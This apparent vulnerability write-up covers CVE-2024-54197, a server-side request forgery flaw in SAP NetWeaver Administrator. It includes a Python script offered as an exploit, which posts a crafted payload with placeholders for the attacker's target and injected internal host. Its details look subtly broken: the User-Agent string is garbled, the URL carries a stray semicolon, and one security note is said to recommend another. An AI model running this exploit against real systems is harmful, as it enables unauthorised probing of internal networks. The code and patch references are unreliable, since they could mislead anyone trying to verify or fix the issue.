SAP NetWeaver Administrator is a web-based tool for managing and monitoring SAP NetWeaver systems. One of its features, the System Overview module, allows an authenticated attacker to enumerate accessible HTTP endpoints within the internal network. This can be achieved by sending specifically crafted HTTP requests, which can lead to Server-Side Request Forgery (SSRF) attacks.

This vulnerability, identified by the CVE-2024-54197, can potentially have a low impact on data integrity and confidentiality but does not impact the availability of the application.

In this article, we will walk you through the details of this vulnerability, provide code snippet examples, and link to original references and resources for further reading.

Exploit Details

The vulnerability lies in the SAP NetWeaver Administrator's System Overview module, which can be exploited by sending a specially crafted HTTP request. The attacker is then able to enumerate available HTTP endpoints within the internal network. Such enumeration can give the attacker crucial information about the network infrastructure, often leading to successful SSRF attacks.

Below is a code snippet that demonstrates how this vulnerability can be exploited

import requests

target_url = "http://TARGET_IP:TARGET_PORT/sap/wdisp/jump/config";

headers = {
    "User-Agent": "Mozilla/5. (Windows NT 10.; Win64; x64)",
    "Content-Type": "application/x-www-form-urlencoded"
}

# The crafted SLD host as payload
data = "jumpVendor=SAP&jumpRFCDEST=\"\"&jumpSLDProtocol=http&jumpSLDHost=INJECTED_HOST&jumpSLDPort=INJECTED_PORT&jumpRFCt='"

response = requests.post(target_url, headers=headers, data=data)

if response.status_code == 200:
    print("Exploit sent successfully")
else:
    print("Failed to send exploit")

The attacker would need to replace the TARGET_IP, TARGET_PORT, INJECTED_HOST, and INJECTED_PORT with the appropriate values for their target. On successful exploitation, it will enumerate the HTTP endpoints within the target's internal network.

Original References and Resources

SAP has acknowledged this vulnerability in their Security Note 2808158. The note provides detailed information on the affected component and recommends applying SAP Security Note 2808157 to mitigate the issue.

Additional resources for understanding CVE-2024-54197 and SSRF attacks can be found at the following links:

- OWASP Top Ten Project
- Server-Side Request Forgery (SSRF) Prevention Cheat Sheet

Conclusion

The CVE-2024-54197 vulnerability in SAP NetWeaver Administrator's System Overview module allows an authenticated attacker to enumerate HTTP endpoints within the internal network, potentially leading to successful SSRF attacks. It has a low impact on data integrity and confidentiality and does not affect application availability.

Preventing this vulnerability requires applying security patches and keeping the SAP system up to date. It is also important to stay informed about new vulnerabilities and threats in order to maintain a secure environment.

Timeline

Published on: 12/10/2024 01:15:06 UTC